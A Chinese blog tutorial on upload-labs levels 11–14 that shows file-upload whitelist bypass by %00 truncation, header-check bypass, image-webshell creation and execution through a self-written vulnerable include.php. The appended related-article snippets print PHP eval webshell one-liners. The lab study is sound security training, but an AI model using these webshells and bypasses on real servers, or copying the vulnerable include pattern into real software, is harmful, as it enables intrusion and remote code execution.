文件上传漏洞进阶教程/白名单绕过/图片马制作/图片马执行

最新推荐文章于 2024-03-16 13:45:00 发布
最新推荐文章于 2024-03-16 13:45:00 发布
阅读量7.4k 收藏 28
点赞数 4
分类专栏: 文件上传漏洞 渗透测试 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40345591/article/details/127476867
版权

一、白名单绕过

相对于前面的黑名单绕过,白名单更加难以绕过,使用白名单验证相对比较安全,但如果存在可控参数目录,也存在被绕过的风险

目录可控%00截断绕过上传

upload-lab pass11 源码分析

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        }
        else{
            $msg = '上传失败!';
        }
    }
    else{
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

deny_arr变成ext_arr,白名单,下面判断后缀名是否在白名单中,代码相较于黑名单也简单不少

但是这里使用了$_GET['save_path']获取客户端的值,这个值可以被客户端修改,从而遗留安全隐患

截断文件名

%00截断需要gpc关闭 php版本要小于5.3.4版本

我这里版本是5.4.45先选择一个低版本

 关闭gpc

 

这种攻击手法其实与sql注入中的注释差不多,%00的意思是忽略后面的内容进行上传,如果我们上传test.png再给服务器传递的save_path改为/upload/test.php%00那么最终上传到服务器的内容为test.php,操作一下,看起来就直观了

尝试上传

看到这里save_path其实就是本地的upload文件夹的路径,在后端中与检测后的文件名拼接,将文件上传,我们通过截断,忽略检测后的内容,直接上传到我们写入的文件中

因为已知是get型,所以直接写%00就ok,get型需要进行编码

 清空前面上传的内容

放包

上传成功

POST型截断

pass-12

只是将GET改成POST了

尝试上传

一样的套路,上传test.php抓包

直接在抓包里进行解码再放包就ok了

二、文件头检测绕过

有的文件上传,上传时会检测文件头,不同的文件,文件头也不一样,常见的文件上传图片头检测 它检测图片两个字节长度,如果不是图片格式,会禁止上传文件

常见的文件头

PNG:89504E47

JPEG:FFD8FF

GIF:47494638

....

对隐写术有些了解的同学应该对这个很熟悉啦

pass-13

代码分析

nction getReailFileType($filename){
    $file = fopen($filename, "rb");
    $bin = fread($file, 2); //只读2字节
    fclose($file);
    $strInfo = @unpack("C2chars", $bin);    
    $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);    
    $fileType = '';    
    switch($typeCode){      
        case 255216:            
            $fileType = 'jpg';
            break;
        case 13780:            
            $fileType = 'png';
            break;        
        case 7173:            
            $fileType = 'gif';
            break;
        default:            
            $fileType = 'unknown';
        }    
        return $fileType;
}

这时提取文件头的函数

对文件进行解包

 

转成整型,然后白名单判断

下面就是获取上传文件,调用这个函数,返回如果不是unknown就上传,代码就不展示了

图片一句话木马

为了绕过上述的检测,我们可以制作图片马,即将图片信息与木马组合到一起上传

制作

准备一张正常的图片,与恶意脚本php,放到一个目录下

 

 目录下运行CMD,执行

copy 1.png/b+test.php test.png

 

生成了一个新的png,我们直接给它上传到服务器

 

右键图片打开链接(获取图片地址),复制url

upload/3520221023175627.png

 这里需要利用文件包含漏洞,才能执行我们的图片马

我看大佬们这一关直接有个提示,有个链接,就是存在文件包含漏洞网页,但我这个靶场可能抽风了,我找了半天也没找到,所以我就自己写了一个,如果你们也没有可以直接再upload-labs文件夹下新建一个include.php

<?php
header("Content-Type:text/html;charset=utf-8");
$file=$_GET['file'];
if(isset($file))
{
	include $file;
}
else{
	show_source(__FILE__);
}
?>

复制保存就ok了

下面进入文件包含漏洞页面

将图片地址给传进去

 看到一堆乱码,这就是前面图片的内容,往下翻,就可以看到phpinfo()的结果啦

上传成功!

三、图片检测函数绕过

pass-14

 getimagesize是获取图片的大小,如果头文件不是图片会报错,直接可以利用图片马

上传

一样的上传我们做好的图片马,通过包含漏洞,进行执行

 

白帽Chen_D
关注
  • 4
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 5
    评论
专栏目录
深入浅出带你了解文件上传白名单绕过
dzqxwzoe的博客
05-12 986
今天比较详细的讲了文件上传白名单绕过原理以及应用方法,可能刚开始学不太好理解。有兴趣的小伙伴可以自己去搭建靶机来进行测试,喜欢的小伙伴不妨一键三连。# 学习计划安排我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!!!如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉。
php一句话图片怎么运行,php图片怎么运行
weixin_31034309的博客
03-10 2199
PHP图片的的运行方法1、标准的写法,直接通过eval执行php代码@eval ($_POST['code']);2、动态执行assert生成一个木文件(隐藏性最好的一种)@$_GET['a']($_GET['code']);3、使用方法:从url中传入下面参数执行后会在当前目录生成一个c.php的文件/index.php?a=assert&code=${fputs%28fopen%...
PHP 图片隐写方法及靶机演示
百彦子烨的博客
11-11 3478
通常在木的实际运用中,我们会面临防御者对文件类型、大小的过滤。有些规定只能上传图片的还可能对图片进行采集,即使攻击者直接更改文件类型也会被拦截。所以我们需要运用隐写技术将木隐藏到图片中,以此来绕过防御,进行上传。
文件上传绕过总结
weixin_55205599的博客
07-02 2852
hp",判定后缀名存在黑名单,将识别到的php删除,后缀只剩下字符组合php,故此时变为a.php。eg:允许上传.jpg,不允许上传.php,如何绕过传.php一句话木呢?eg:a.pphphp 从左到右识别,识别第二到第四位的php时,即"p。eg:黑名单过滤中只有".php",没有".php "、“ .php”eg : a.JSP、a.Jsp 、a.jsP、a.jSP等等。eg:"a.php.",黑名单没有对"php."过滤,则绕过。eg: a.php改为 a.php::$data。
文件上传(包括编辑器上传)漏洞绕过总结(适用于pte考试、ctf及常规测试、修复任意文件上传漏洞可做参考)
最新发布
qq_44005305的博客
03-16 1102
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
一句话图片
热门推荐
qq_44111753的博客
08-20 1万+
一句话图片 一、准备图片 1、准备任意图片pho.jpg 2、准备木文件hack.php <?php @eval($_POST['hack']);?> 3、利用系统命令,将木复制到图片文件中,产生图片hack.jpg copy pho.jpg/b+hack.php/a hack.jpg b二进制格式,a为ASCII 二、上传图片 三、利用文件包含漏洞解析图片(没有文件包含漏洞图片将无法执行) 1、 右键图片复制图片地址,找到图片具体位置(upload//4820
文件上传绕过
helloKittywz的博客
11-27 421
学习记录
web安全文件上传制作图片的小工具 Hexcmp.7z
11-21
web安全文件上传图片上传,制作图片,将图片以16进制打开。
C#判断上传文件是否是图片以防止木上传的方法
09-04
然而,它可能无法识别那些文件头被篡改或加密的木文件,尤其是当恶意文件通过特殊工具生成,以绕过简单的文件头检查时。 为了提高安全性,通常建议结合使用这两种方法。首先使用文件头检查快速过滤大部分非图片...
2022年文件上传漏洞绕过姿势整理,过waf版
11-20
2022年文件上传漏洞绕过姿势整理,过waf版,绕过思路:对文件的内容,数据。数据包进行处理。2.通过替换大小写来进行绕过
文件上传漏洞常见绕过方法
05-26
1、前端js检测文件格式 2、上传的文件时加入了“Content-Type”验证 3、文件后缀验证 4、文件后缀黑名单 5、文件头验证 6、文件内容初级验证 7、文件上传+文件包含
奇安信代码卫士,文件上传漏洞解决demo
04-23
(1)使用白名单控制上传文件类型,即只允许指定扩展名的文件上传。 (2)对上传文件后缀与MIME Type进行匹配校验, 对文件头信息与文件后缀进行匹配校验。 (3)对单个文件大小和总文件数进行限制, 避免拒绝服务...
Golin 弱口令/漏洞/扫描/等保/基线核查的快速安全检查小工具
02-23
主机存活探测、漏洞扫描、子域名扫描、端口扫描、各类服务数据库爆破、poc扫描、xss扫描、webtitle探测、web指纹识别、web敏感信息泄露、web目录浏览、web文件下载、等保安全风险问题风险自查等; 弱口令/未授权访问...
zjcoj.zip_locationn2k_漏洞扫描_系统/网络安全
07-15
【标题】"zjcoj.zip_locationn2k_漏洞扫描_系统/网络安全"是一个包含VC++编程语言编写的漏洞扫描程序源代码的压缩文件。这个程序主要用于检测和识别locationn2k相关的安全漏洞,这可能是一个特定的系统或网络环境下...
通达OA header身份认证绕过漏洞利用工具
12-25
通达OA header身份认证绕过漏洞利用脚本,可以检测漏洞是否存在并生成可用的cookie
简单的文件上传漏洞以及前端后端的简单绕过思路
太阳照耀我走四方
02-14 1070
简单的文件上传漏洞以及前端后端的简单绕过思路
Web安全--文件上传漏洞
bobo_milk的博客
11-11 1097
本文参考了一些文章,如有侵权请留言删除。该文章基于upload-labs基础靶场进行编写。
图片 php 菜刀,图片制作以及菜刀的使用
weixin_30407563的博客
04-14 1178
有些网站我们在拿shell的时候,会要用到上传文件,但是有的时候都会有过滤,如果只是上传.asp .php结尾的文件的话系统是不会给你上传的,那么这个时候我们通常会利用一些其他的思路,比如说iis6中的解析漏洞,把一句话放到图片里面,写成1.asp;.jpg 1.asp;.jpg的格式上传上去,这样上传的时候文件会被检测为是图片,上传成功之后会将这个文件当asp来解析图片WEB渗透测试时的必备...
vulhub漏洞靶场搭建
07-25
Vulhub漏洞靶场是一个面向大众的开源漏洞靶场,旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。搭建Vulhub漏洞靶场可以按照以下步骤进行操作: 1. 下载Vulhub压缩包,并上传到虚拟机的任意目录。可以使用离线安装或者Git安装两种方法中的任意一种。离线安装可以通过下载Vulhub压缩包并解压来完成,Git安装可以使用以下命令进行安装: ``` $ git clone https://github.com/vulhub/vulhub.git ``` 如果没有安装Git,需要先安装Git: ``` $ yum install -y git ``` 2. 安装Docker和Docker-Compose。可以使用以下命令进行安装: ``` $ curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun $ curl -L https://github.com/docker/compose/releases/latest/download/docker-compose-`uname -s`-`uname -m` -o /usr/local/bin/docker-compose $ chmod +x /usr/local/bin/docker-compose ``` 3. 运行Vulhub漏洞靶场镜像。在Vulhub目录下执行以下命令: ``` $ cd vulhub/ $ docker-compose up -d ``` 这样就完成了Vulhub漏洞靶场的搭建。你可以通过访问相应的地址和端口来进行漏洞复现和实操。请注意,搭建漏洞靶场需要一定的安全意识和技术知识,建议在合适的环境中进行操作。 #### 引用[.reference_title] - *1* [开源漏洞靶场 Vulhub环境搭建](https://blog.csdn.net/tianlang2013/article/details/123621374)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Vulhub漏洞靶场搭建](https://blog.csdn.net/m0_61869253/article/details/129649232)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽Chen_D

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值